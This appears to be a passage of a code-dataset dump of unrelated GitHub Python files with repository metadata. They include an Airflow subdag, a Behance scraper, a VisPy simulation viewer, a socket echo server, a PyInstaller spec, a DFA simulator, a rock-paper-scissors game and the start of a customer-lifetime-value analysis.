@staticmethod\n def module_state(session_state):\n return mod_ctx.State(session_state)\n\n @staticmethod\n def class_state(module_state, request):\n if request.cls is not None:\n return mod_ctx.State(module_state)\n else:\n return None\n\n @staticmethod\n def function_state(module_state, class_state):\n parent_state = class_state if class_state is not None else module_state\n return mod_ctx.State(parent_state)\n\n\ndef __ctx_init(self, request, manager, state):\n self.__request = request\n self.__manager = manager\n self.__state = state\n super(Context, self).__init__()\n\n\n@property\ndef __ctx_request(self):\n return self.__request\n\n\n@property\ndef __ctx_manager(self):\n return self.__manager\n\n\n@property\ndef __ctx_state(self):\n return self.__state\n\n\nContext = type('Context', tuple(__ALL_CONTEXTS), dict(\n __init__=__ctx_init,\n request=__ctx_request,\n manager=__ctx_manager,\n state=__ctx_state,\n))\n\n\n@multiscope.fixture(pytest_fixtures=['request'])\ndef ctx(request, manager, state):\n return Context(request, manager, state)\n\n\ndef create_fixture(mixin_cls, params=None, ids=None):\n class LocalContext(Context, mixin_cls):\n pass\n\n @pytest.fixture(params=params, ids=ids)\n def fixture_func(request, manager, state):\n return LocalContext(request, manager, state)\n\n return fixture_func\n\n\npytest_plugins = [p.__name__ for p in __KNOWN_PLUGINS]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"balancer/test/plugin/context/_context.py","file_name":"_context.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21270107713","text":"from airflow import DAG\nfrom operators import LoadDimensionOperator\nfrom helpers import SqlQueries\n\ndef get_load_dim_subdag (\n parent_dag_name, \n task_id,\n redshift_conn_id,\n default_args,\n *args, **kwargs):\n\n dag = DAG(\n dag_id=f\"{parent_dag_name}.{task_id}\",\n default_args=default_args,\n catchup=False,\n schedule_interval='0 * * * *'\n )\n\n 
load_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"users\",\n et_query=SqlQueries.user_table_insert\n )\n\n load_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"songs\",\n et_query=SqlQueries.song_table_insert\n )\n\n load_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"artists\",\n et_query=SqlQueries.artist_table_insert\n )\n\n load_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"time\",\n et_query=SqlQueries.time_table_insert\n )\n\n load_user_dimension_table\n load_song_dimension_table\n load_artist_dimension_table\n load_time_dimension_table\n\n return dag\n\n\n","repo_name":"mathias-mike/Project-Sparkify","sub_path":"Pipeline/dags/load_dim_subdag.py","file_name":"load_dim_subdag.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15780414894","text":"import json\nimport re\n\nimport requests\n\nfrom 图片采集4_0.config import country_data_dict_list\n\nheaders = {\n \"authority\": \"www.behance.net\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\n \"cache-control\": \"max-age=0\",\n \"sec-ch-ua\": \"\\\"Chromium\\\";v=\\\"112\\\", \\\"Microsoft Edge\\\";v=\\\"112\\\", \\\"Not:A-Brand\\\";v=\\\"99\\\"\",\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"\\\"Windows\\\"\",\n \"sec-fetch-dest\": \"document\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"none\",\n \"sec-fetch-user\": \"?1\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68\"\n}\ncookies = {\n \"OptanonAlertBoxClosed\": \"2024-04-19T02:53:52.257Z\",\n \"OptanonConsent\": \"groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1\",\n \"dialog_dismissals\": \"announcement_36%3Blogin_prompt\",\n \"sign_up_prompt\": \"true\",\n \"gki\": \"{%22feature_adobe_checkout_modal_primary_nav%22:false%2C%22feature_creative_cloud_search%22:false%2C%22feature_gql_profile_drafts_request%22:false%2C%22feature_inbox_file_uploads%22:false}\",\n \"AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg\": \"870038026%7CMCMID%7C19164445593973786131767815682217063165%7CMCAID%7CNONE%7CMCOPTOUT-1683277804s%7CNONE%7CvVersion%7C5.0.0\",\n \"gk_suid\": \"29516305\",\n \"originalReferrer\": \"\",\n \"ilo0\": \"true\",\n \"bcp\": \"05807658-7637-4841-a422-b6b66de68002\"\n}\nurl = \"https://www.behance.net/hire\"\n\nDataList = country_data_dict_list()\n\ndata = []\ndata_file = []\n\nwith open('./创作者总共数量.json', 'r') as f:\n fails = json.load(f)\n\n\ndef obtainTheNumberOfPeople():\n for country in DataList[13:]:\n print(f\"当前是:{DataList.index(country) + 1} 个,共计:{len(DataList)}\")\n print(country)\n params = {\n \"country\": f\"{country['value']}\"\n }\n response = requests.get(url, headers=headers, cookies=cookies, params=params)\n if response.status_code == 200:\n Html = response.text\n\n match = re.search(r'\"totalSearchCount\":(\\d+),', Html)\n if match:\n total_search_count = 
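# Hedged sketch of attaching get_load_dim_subdag above to a parent DAG; the
# SubDagOperator import path matches Airflow 2.x, and parent_dag plus
# default_args are assumed to exist in the parent DAG file.
from airflow.operators.subdag import SubDagOperator

load_dimensions = SubDagOperator(
    task_id="load_dimensions",  # must match the task_id baked into the subdag's dag_id
    subdag=get_load_dim_subdag(
        parent_dag_name="sparkify_etl",
        task_id="load_dimensions",
        redshift_conn_id="redshift",
        default_args=default_args,
    ),
    dag=parent_dag,
)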
match.group(1)\n # print(total_search_count)\n data.append({f\"{country['label']}\": total_search_count})\n # print(data)\n fails.append({f\"{country['label']}\": total_search_count})\n with open('./创作者总共数量.json', 'w') as f:\n json.dump(fails, f)\n print(f\"{country['value']} 成功获取\")\n # time.sleep(random.randint(1, 3))\n else:\n print(f\"{country['label']} 状态码不正确\")\n data_file.append(country)\n\n\ndef calculateTheNumberOfPeople():\n total = 0\n for i in fails:\n total = total + int(i[DataList[fails.index(i)]['label']])\n print(total)\n\n\nif __name__ == '__main__':\n \"\"\"\n 获取网站上国家的人数,写入json文件\n \"\"\"\n # obtainTheNumberOfPeople()\n \"\"\"\n 打印所有的国家的创作者的人数\n \"\"\"\n calculateTheNumberOfPeople()\n","repo_name":"Cykypa/Cykypa_SWT","sub_path":"图片采集4_0/创作者总数测试.py","file_name":"创作者总数测试.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"763083632","text":"from sqlalchemy import Column\nfrom db.cm_session import cm_session, Base\nfrom sqlalchemy.dialects.mssql import BIT, CHAR, DATETIME, NVARCHAR\n\n\nclass TbRedAlert(Base):\n __tablename__ = 'tb_RedAlert'\n RA_ID = Column(CHAR(36), primary_key=True, nullable=False)\n RA_Temporary = Column(BIT)\n RA_IssuedTime = Column(DATETIME)\n RA_CreatorName = Column(NVARCHAR(256))\n RA_TamID = Column(CHAR(36))\n RA_Closed = Column(BIT)\n RA_ClosedTime = Column(DATETIME)\n RA_ScheduleDownloadID = Column(CHAR(36))\n RA_IsAutoStop = Column(BIT)\n RA_PlannedStopTime = Column(DATETIME)\n","repo_name":"hsiang0107/Restful_API_Testing","sub_path":"db/models/tb_RedAlert.py","file_name":"tb_RedAlert.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24447503360","text":"from os import environ\nimport aiohttp\nimport json\nimport nats\nfrom logging import getLogger, basicConfig, DEBUG\nfrom bs4 import BeautifulSoup\n\nbasicConfig(level=DEBUG)\nlogger = getLogger(__name__)\nlogger.info(\"starting\")\n\n\nasync def get_nats_connection():\n NATS_HOST = environ.get(\"NATS_SERVER\", \"nats://demo.nats.io:4222\")\n return await nats.connect(NATS_HOST)\n\n\nasync def http_get(url: str):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n ret = await response.text()\n logger.info(f\"url {url} returned {ret[0:15]}...\")\n return ret\n except Exception as e:\n logger.exception(e)\n\n\ndef parse_title(html):\n soup = BeautifulSoup(html, \"html.parser\")\n title = soup.find(\"title\")\n return title.text\n\n\nasync def get_title_from_nats(nc, url):\n payload = json.dumps({\"method\": \"GET\", \"url\": url})\n resp = await nc.request(\"url_getter\", payload.encode(), timeout=15)\n return parse_title(resp.data)\n","repo_name":"abloch/nats-url-getter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42841820270","text":"import barneshut_cpp.cppsim as cs\nfrom helper_files.sim_utils import get_positions\nfrom helper_files.mass_to_color import bodies_to_color\nimport argparse\nimport numpy as np\nfrom vispy import app, gloo, scene\nfrom vispy.visuals import Visual\nfrom vispy.plot import Fig\nfrom vispy.scene.cameras import ArcballCamera, FlyCamera\nfrom vispy import io\nimport imageio\nfrom tqdm import tqdm\n\napp.use_app('PyQt5')\n\n\"\"\"\nThis module visualizes a BINV-file using 
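# Hedged async driver for the NATS helpers above; it uses the demo.nats.io
# default baked into get_nats_connection(), so it needs outbound network
# access and a responder on the url_getter subject to actually reply.
import asyncio

async def main():
    nc = await get_nats_connection()
    try:
        print(await get_title_from_nats(nc, "https://example.com"))
    finally:
        await nc.close()

# asyncio.run(main())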
VisPy and OpenGL. \nIt supports recording, speed adjustment, camera adjustment and standard sizes.\nUse the `-r ` option to record to a file. This file can have any format.\nKeybinding:\n* `]` Double speed of replay\n* `[` Half speed of replay\n* `r` Start recording, only if `-r` passed\n* `s` Stop recording, quits the visualization\n* `m` Make shot (one full play)\n* `Esc` Quit the visualization\n* `f` Set full HD size, 1920x1080\n* `h` Set HD size, 1280x720 \n* F11 Set fullscreen\n* `=` Increase pointsize by 1\n* `-` Decrease pointsize by 1\n* `spacebar` Pause and continue\n* `z` zoom in\n* `x` zoom out\n\"\"\"\n\n\n\nvertex_shader = \"\"\"\nvarying vec3 v_color;\nvoid main() {\n gl_Position = $transform(vec4($position, 1));\n gl_PointSize = $pointsize;\n v_color = $color;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\nuniform sampler2D u_texture;\nvarying vec3 v_color;\nvoid main() {\n float star_tex_intensity = texture2D(u_texture, gl_PointCoord).r;\n gl_FragColor = vec4(star_tex_intensity * v_color, 0.8);\n}\n\"\"\"\n\n\ndef load_star_image():\n #fname = io.load_data_file('galaxy/star-particle.png')\n raw_image = io.read_png('helper_files/star-particle.png')\n return raw_image\n\n\ndef load_data(filename, mass_scale, show_dm, no_show_m, darkmatter_intensity):\n print(\"Start loading data...\")\n preloaded = cs.Result.load(filename).numpy()\n print(\"Selecting data...\")\n func = np.vectorize(lambda b: (show_dm and b.dark_matter) or (not no_show_m and not b.dark_matter))\n preloaded = preloaded[:,func(preloaded[0])]\n print(preloaded.shape)\n print(\"Extracting positions and adding color...\")\n positions = get_positions(preloaded).astype(np.float32)\n c = bodies_to_color(preloaded[0], mass_scale)\n if show_dm:\n dm_index = [i for i, b in enumerate(preloaded[0]) if b.dark_matter]\n c[dm_index] = [0, darkmatter_intensity, 0]\n colors = gloo.VertexBuffer(c)\n print(\"Data loaded and ready for GPU\")\n return positions, colors\n\nclass GalaxyVisual(Visual):\n def __init__(self, positions, colors):\n Visual.__init__(self, vertex_shader, fragment_shader)\n self.positions = positions\n self.colors = colors\n self.frames = self.positions.shape[0]\n self._vertices = gloo.VertexBuffer()\n self.set_vertex_data(0)\n self._draw_mode = 'points'\n self.texture = gloo.Texture2D(load_star_image(), interpolation='linear')\n self.shared_program['u_texture'] = self.texture\n self.shared_program.vert['color'] = self.colors\n self.pointsize = 5\n self.set_gl_state(clear_color=(0.0, 0.0, 0.03, 1.0), \n depth_test=False, blend=True,\n blend_func=('src_alpha', 'one'))\n def set_vertex_data(self, i):\n self._vertices.set_data(self.positions[i])\n self.update()\n\n def _prepare_transforms(self, view):\n view.view_program.vert['transform'] = view.get_transform()\n\n def _prepare_draw(self, view):\n self.shared_program.vert['position'] = self._vertices\n self.shared_program.vert['pointsize'] = self.pointsize\n\n\n\n# Argument parsing\nparser = argparse.ArgumentParser(description=\"Visualize simulation\")\nparser.add_argument('file', help=\"binv file to play\")\nparser.add_argument('-r', '--record', default='-', type=str, help=\"Record to file\")\nparser.add_argument('-m', '--massscale', default=1, type=float, help=\"Mass scale\")\nparser.add_argument('-d', '--darkmatter', action='store_true', help=\"Whether to show darkmatter\")\nparser.add_argument('-i', '--darkmatter_intensity', default=0.5, type=float, help=\"Darkmatter intensity 0.0 to 1.0\")\nparser.add_argument('-o', '--no_ordinary_matter', action='store_true', 
help='Whether to remove ordinary matter')\nargs = parser.parse_args()\n\n\n# Data loading\npos, col = load_data(args.file, args.massscale, args.darkmatter, args.no_ordinary_matter, args.darkmatter_intensity)\n\nprint(\"Starting GUI\")\nGalaxy = scene.visuals.create_visual_node(GalaxyVisual)\ncanvas = scene.SceneCanvas(size=(800, 800), keys='interactive', show=True)\nview = canvas.central_widget.add_view()\nview.camera = ArcballCamera(fov=45, distance=5e20)\n\n# Create Globals\nprint(\"Start the galaxy visual\")\nvis = Galaxy(pos, col, parent=view.scene)\nprint(\"Created visual\")\ntimescale = 1\nrecord = False\ncan_record = args.record != '-'\nfilename = args.record\nframes = []\nfps = 1\npaused = False\nlag = 0\nstart_shot= False\nstarted_shot = False\nfinished_shot = False\n\n# fps setter\ndef set_fps(result):\n global fps\n fps = result\n\n\n# Handle update\ndef update_vertices(ev, *args):\n global vis, timescale, canvas, frames, lag, paused, record, start_shot, started_shot, finished_shot\n if not paused:\n index = int((ev.count-lag) / timescale) % vis.frames\n vis.set_vertex_data(index)\n if start_shot and index == 0:\n if started_shot:\n finished_shot = True\n print(\"Start round\")\n record = True\n started_shot = True\n\n else:\n lag += 1\n if record:\n im = canvas.render()\n frames.append(im)\n if finished_shot:\n print(\"Start saving\")\n record = False\n can_record = False\n app.quit()\n canvas.close()\n print(\"Saving...\")\n write_recording()\n\ntimer = app.Timer()\ntimer.connect(update_vertices)\ntimer.start(0)\n\ndef write_recording():\n global frames, filename, fps\n writer = imageio.get_writer(filename, fps=fps, codec='libx264', quality=10, pixelformat='yuv420p')\n for i in tqdm(frames):\n writer.append_data(i)\n writer.close()\n print(\"Saved to file\", filename)\n\n\n# Handle speedupapp.use_app('Pyglet')\n@canvas.events.key_press.connect\ndef handle_key(ev):\n global timescale, record, can_record, frames, filename, canvas, paused, start_shot, view\n if ev.text == ']':\n # Increase speed\n timescale /= 2\n print(\"Timescale is now\", timescale)\n elif ev.text == '[':\n # Decrease speed\n timescale *= 2\n print(\"Timescale is now\", timescale)\n elif ev.text == 'r':\n # Start record\n if record:\n print(\"Already recording\")\n elif can_record:\n record = True\n print(\"Started recording\")\n # Measure fps\n canvas.measure_fps(callback=set_fps)\n else:\n print(\"Record is disabled\")\n elif ev.text == 's':\n if can_record and record:\n record = False\n can_record = False\n app.quit()\n canvas.close()\n print(\"Saving...\")\n write_recording()\n elif ev.text == 'f':\n canvas.size = (1920, 1080)\n elif ev.text == 'h':\n canvas.size = (1280, 720)\n elif ev.text == '=':\n vis.pointsize += 1\n print(f\"Pointsize is {vis.pointsize}\")\n elif ev.text == '-':\n vis.pointsize -= 1\n print(f\"Pointsize is {vis.pointsize}\")\n elif ev.text == ' ':\n if paused:\n print(\"Unpaused\")\n else:\n print(\"Paused\")\n paused = not paused\n elif ev.text == 'm':\n start_shot = True\n elif ev.text == 'z':\n view.camera.distance *= 0.9\n elif ev.text == 'x':\n view.camera.distance *= 1.1\napp.run()","repo_name":"lucashc/StellarSim","sub_path":"helper_files/vispy.py","file_name":"vispy.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"70903661202","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport socket\n#SERVIDOR\nhost = '127.0.0.1'\nporta = 50000\ncaminho = (host, 
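# Minimal sketch of the recording path used by write_recording() above:
# frames captured via canvas.render() are plain uint8 arrays, so the same
# imageio writer settings work on synthetic frames too (requires the
# imageio-ffmpeg backend).
import numpy as np
import imageio

demo_frames = [np.zeros((64, 64, 3), dtype=np.uint8) for _ in range(10)]
writer = imageio.get_writer("demo.mp4", fps=30, codec="libx264", quality=10, pixelformat="yuv420p")
for frame in demo_frames:
    writer.append_data(frame)
writer.close()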
porta)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(caminho)\ns.listen()\n\ncon, caminho_cliente = s.accept()\n\nprint(caminho_cliente)\n\nwhile True:\n dados = con.recv(1024)\n con.sendall(dados)\n if not dados:\n break\n print('Mensagem recebida: ', dados.decode())\n\ns.close()\n","repo_name":"GabrielMendesdc/Socket","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34854034740","text":"import logging\nimport json\nimport azure.functions as func\nimport azure.durable_functions as df\n\nfrom .. import DocumentGrapher\n\nasync def main(req: func.HttpRequest, starter: str) -> func.HttpResponse:\n client = df.DurableOrchestrationClient(starter)\n\n try:\n body = json.dumps(req.get_json())\n except ValueError:\n return func.HttpResponse(\n \"Invalid body\",\n status_code=400\n )\n \n # If there is nowhere to put the translated documents just skip.\n if body:\n values = json.loads(body)['values']\n \n # Prepare the Output before the loop\n results = {}\n results[\"values\"] = []\n\n for value in values:\n output_record=create_empty_record(value)\n\n instance_id = await client.start_new(\"DocumentGrapherOrchestrator\", None, value)\n logging.info(f\"Started orchestration with ID = '{instance_id}'.\")\n output_record['data']['message']=instance_id\n\n if output_record != None:\n results[\"values\"].append(output_record)\n\n return func.HttpResponse(json.dumps(results, ensure_ascii=False), mimetype=\"application/json\")\n else:\n return func.HttpResponse(\n \"Invalid body\",\n status_code=400\n )\n\ndef create_empty_record(value):\n document = {}\n document['recordId'] = value['recordId']\n document['data'] = {}\n document['warnings'] = []\n document['errors'] = []\n\n return document\n","repo_name":"microsoft/dstoolkit-km-solution-accelerator","sub_path":"src/CognitiveSearch.Skills/Python/Graph/shared_code/DocumentGrapher/Durable/HttpStart_init.py","file_name":"HttpStart_init.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"72498008080","text":"# -*- mode: python ; coding: utf-8 -*-\nimport sys\nprint(\"python ver:\", sys.version[:3])\nif sys.version[:3] < \"3.7\":\n sys.exit()\nelse:\n print(\"python version okay\")\n\nimport vispy.glsl\nimport vispy.io\nimport distributed\nimport dask\n# import m2cgen\nimport napari\nimport gdown\nfrom PyInstaller.utils.hooks import get_module_file_attribute\n\nfrom distutils.sysconfig import get_python_lib\n\nfrom os import path\nskimage_plugins = Tree(\n path.join(get_python_lib(), \"skimage\",\"io\",\"_plugins\"),\n prefix=path.join(\"skimage\",\"io\",\"plugins\"),\n)\n\nblock_cipher = None\n\n# (os.path.join(os.path.dirname(get_module_file_attribute('sklearn.cluster')), \"_k_means_common.cpython-39-darwin.so\"), \"sklearn.cluster._k_means_common\")\n\na = Analysis(['../../aydin/cli/cli.py'],\n pathex=['/Users/ahmetcan.solak/Dev/AhmetCanSolak/aydin/aydin/cli'],\n binaries=[],\n datas=[(os.path.join(os.path.dirname(napari.__file__)), 'napari'),\n (os.path.join(os.path.dirname(dask.__file__)), 'dask'),\n (os.path.join(os.path.dirname(distributed.__file__)), 'distributed'),\n (os.path.dirname(vispy.glsl.__file__), os.path.join(\"vispy\", \"glsl\")),\n (os.path.join(os.path.dirname(vispy.io.__file__), \"_data\"), os.path.join(\"vispy\", \"io\", \"_data\"))],\n hiddenimports=[\n 
\"aydin.it.transforms.attenuation\",\n \"aydin.it.transforms.deskew\",\n \"aydin.it.transforms.fixedpattern\",\n \"aydin.it.transforms.highpass\",\n \"aydin.it.transforms.histogram\",\n \"aydin.it.transforms.motion\",\n \"aydin.it.transforms.padding\",\n \"aydin.it.transforms.periodic\",\n \"aydin.it.transforms.range\",\n \"aydin.it.transforms.salt_pepper\",\n \"aydin.it.transforms.variance_stabilisation\",\n \"numba.core.typing.cffi_utils\",\n \"aydin.it.regression.cb\",\n \"aydin.it.regression.lgbm\",\n \"aydin.it.regression.linear\",\n \"aydin.it.regression.nn\",\n \"aydin.it.regression.random_forest\",\n \"aydin.it.regression.support_vector\",\n \"sklearn.neighbors._partition_nodes\",\n \"sklearn.cluster.*\",\n \"pydantic\",\n \"magicgui\",\n \"napari_plugin_engine\",\n \"qtpy\",\n \"imageio.plugins.tifffile\",\n \"imageio.plugins.pillow_legacy\",\n \"imageio.plugins.ffmpeg\",\n \"imageio.plugins.bsdf\",\n \"imageio.plugins.dicom\",\n \"imageio.plugins.feisem\",\n \"imageio.plugins.fits\",\n \"imageio.plugins.gdal\",\n \"imageio.plugins.simpleitk\",\n \"imageio.plugins.npz\",\n \"imageio.plugins.spe\",\n \"imageio.plugins.swf\",\n \"imageio.plugins.grab\",\n \"imageio.plugins.lytro\",\n \"imageio.plugins.freeimage\",\n \"imageio.plugins.freeimagemulti\",\n \"napari._qt\",\n \"psygnal._signal\",\n \"sklearn.utils._typedefs\",\n \"sklearn.utils._heap\",\n \"sklearn.utils._sorting\",\n \"sklearn.utils._vector_sentinel\",\n \"gdown.download\", \"napari\", \"tensorflow_core._api.v2.compat\",\"vispy.app.backends._pyqt5\",\"vispy.glsl\",\n \"sklearn.utils._cython_blas\"],\n hookspath=[\"hooks\"],\n runtime_hooks=[\n \"runtimehooks/hook-bundle.py\",\n \"runtimehooks/hook-multiprocessing.py\",\n \"runtimehooks/hook-splash.py\"\n ],\n excludes=[])\n\npyz = PYZ(a.pure)\n\n# filter binaries.. exclude some dylibs that pyinstaller packaged but\n# we actually dont need (e.g. 
wxPython)\n\nimport re\nreg = re.compile(\".*(PyQt4|k_means|mpl-data|zmq|QtWebKit|QtQuick|wxPython).*\")\n\n# from pprint import pprint\n# pprint(a.binaries)\n\na.binaries = [s for s in a.binaries if reg.match(s[1]) is None]\n\na.datas += [(\"biohub_logo.png\", \"/Users/ahmetcan.solak/Dev/AhmetCanSolak/aydin/aydin/gui/resources/biohub_logo.png\", 'DATA')]\n\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=1,\n # a.binaries,\n # a.zipfiles,\n # a.datas,\n name='aydin',\n debug=False,\n #debug=True,\n strip=None,\n upx=True,\n console=True )\n\napp = BUNDLE(exe,\n name='aydin.app',\n upx=True,\n icon=None)\n\n\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n name='aydin')\n","repo_name":"royerlab/aydin","sub_path":"build/osx/aydin.spec","file_name":"aydin.spec","file_ext":"spec","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"3"} +{"seq_id":"19541198984","text":"with open(\"automat.txt\", \"r\") as f:\r\n stare_initiala = 'q0'\r\n tranzitii = {}\r\n stari_acceptate = []\r\n stari_finale = []\r\n cuvant = ''\r\n lines=f.readlines()\r\n ok=1\r\n for line in lines:\r\n if ok<=len(lines)-2:\r\n q1, simbol, q2 = line.strip().split()\r\n tranzitii[(q1, simbol)] = q2\r\n stari_acceptate.append(q2)\r\n stari_acceptate.append(q1)\r\n ok+=1\r\n else:\r\n if ok==len(lines)-1:\r\n for q in line.strip().split():\r\n stari_finale.append(q)\r\n ok=len(lines)\r\n else:\r\n cuvant = line.split()\r\n stari_acceptate = set(stari_acceptate)\r\n stari_acceptate = list(stari_acceptate)\r\n stari_finale = set(stari_finale)\r\n stari_finale = list(stari_finale)\r\n\r\ndef DFA(cuvant):\r\n drumul_parcurs = []\r\n stare_curenta = stare_initiala\r\n cuvant = list(cuvant[0])\r\n for litera in cuvant:\r\n if (stare_curenta, litera) not in tranzitii:\r\n return False\r\n drumul_parcurs.append(stare_curenta)\r\n stare_curenta = tranzitii[(stare_curenta, litera)]\r\n if stare_curenta in stari_finale:\r\n drumul_parcurs.append(stare_curenta)\r\n return drumul_parcurs\r\n else:\r\n return False\r\n\r\nwith open(\"final.txt\", \"w\") as f:\r\n if cuvant == []:\r\n if 'q0' in stari_finale:\r\n f.write(\"Acceptat\")\r\n else:\r\n f.write(\"Neacceptat\")\r\n else:\r\n if DFA(cuvant) == False:\r\n f.write(\"Neacceptat\")\r\n else:\r\n f.write(\"Acceptat\")\r\n f.write(\"\\n\")\r\n raspuns=DFA(cuvant)\r\n for r in raspuns:\r\n f.write(r)\r\n f.write(\" \")\r\n","repo_name":"TeonaB/Limbaje-formale-si-automate","sub_path":"Project1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9692253486","text":"#A game of rock, paper, scissors with an ongoing scoreboard and repeating indefinitely\n\nimport random\n\nchoices = ('rock','paper','scissors')\nplayer_score = int(0)\ncomputer_score = int(0)\ncurrent_winner = 'a draw'\nrepeat = True\nfirst_game = True\n\nname = input(\"Welcome! What's your name?\")\nprint(f'Hello {name}!')\n\ndef play_game(your_choice, my_choice) :\n global player_score\n global computer_score\n print(f'You chose {your_choice}. Nice choice!\\nI chose {my_choice}.')\n if your_choice == 'rock' and my_choice == 'scissors' :\n print(f'Rock blunts scissors. {name} wins!')\n player_score += 1\n if your_choice == 'rock' and my_choice == 'paper' :\n print('Paper wraps rock. 
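# Illustrative automat.txt for the DFA reader above (layout inferred from the
# parsing code: one "state symbol next_state" line per transition, then a
# line listing the final states, then the input word). This machine accepts
# words over {a, b} that end in b; for "aab" it writes Acceptat and the path
# q0 q0 q0 q1.
#
# q0 a q0
# q0 b q1
# q1 a q0
# q1 b q1
# q1
# aab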
I win!')\n computer_score += 1\n if your_choice == 'scissors' and my_choice == 'rock' :\n print('Rock blunts scissors. I win!')\n computer_score += 1\n if your_choice == 'scissors' and my_choice == 'paper' :\n print(f'Scissors cut paper. {name} wins!')\n player_score += 1\n if your_choice == 'paper' and my_choice == 'rock' :\n print(f'Paper wraps rock. {name} wins!')\n player_score += 1\n if your_choice == 'paper' and my_choice == 'scissors' :\n print(f'Scissors cut paper. I win!')\n computer_score += 1\n elif your_choice == my_choice :\n print(f\"You chose {your_choice}, and I chose {my_choice}. It's a draw!\")\n \n if first_game == False :\n calculate_score()\n\ndef make_choice() :\n print('--------------------------------------------')\n player_choice = input(str(f'Please choose one: {choices} '))\n computer_choice = random.choice(choices)\n\n while not player_choice in choices :\n print(f\"Hey, no cheating! You chose '{player_choice}' which isn't a valid choice.\")\n player_choice = input(str(f'Please make another choice from {choices}'))\n print(player_choice) \n \n play_game(player_choice, computer_choice)\n \n\nif first_game == True :\n make_choice()\n\ndef calculate_score() :\n print(f\"The score is:\\n{name}: {player_score}\\nMe: {computer_score}\")\n\n if player_score > computer_score : \n current_winner = name \n elif computer_score > player_score : \n current_winner = 'me' \n elif player_score == computer_score : \n current_winner = 'a tie'\n \n global first_game\n first_game = False\n\n print(f\"The current winner is {current_winner}! Shall we play again?\")\n make_choice()\n\nif first_game == True :\n calculate_score()","repo_name":"charlottemothersole/games","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39832759463","text":"#BUSINESS PROBLEM\n\n#FLO is one of the biggest shoes and clothing company wants to determine roadmap for sales and marketing.\n#The potential value that existing customers will provide to the company in the future so that the company can make\n#a medium-long-term plan needs to be estimated.\n\n#Data preparation\n\ndf_ = pd.read_csv(\"/Users/birsenbayat/Desktop/miuul/PythonProgrammingForDataScience/CRM_Analitigi/FLOCLTVPrediction/flo_data_20k.csv\")\ndf = df_.copy()\n\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom lifetimes import BetaGeoFitter\nfrom lifetimes import GammaGammaFitter\nfrom lifetimes.plotting import plot_period_transactions\npd.set_option('display.max_columns', None)\npd.set_option(\"display.width\", 500)\n# pd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n#Define the outlier_thresholds and replace_with_thresholds functions needed to suppress outliers\n\ndef outlier_thresholds(dataframe, variable):\n quartile1 = dataframe[variable].quantile(0.01)\n quartile3 = dataframe[variable].quantile(0.99)\n interquantile_range = quartile3 - quartile1\n up_limit = quartile3 + 1.5 * interquantile_range\n low_limit = quartile1 - 1.5 * interquantile_range\n return round(low_limit), round(up_limit)\n\ndef replace_with_thresholds(dataframe, variable):\n low_limit, up_limit = outlier_thresholds(dataframe, variable)\n # dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\n\n#if \"order_num_total_ever_online\", 
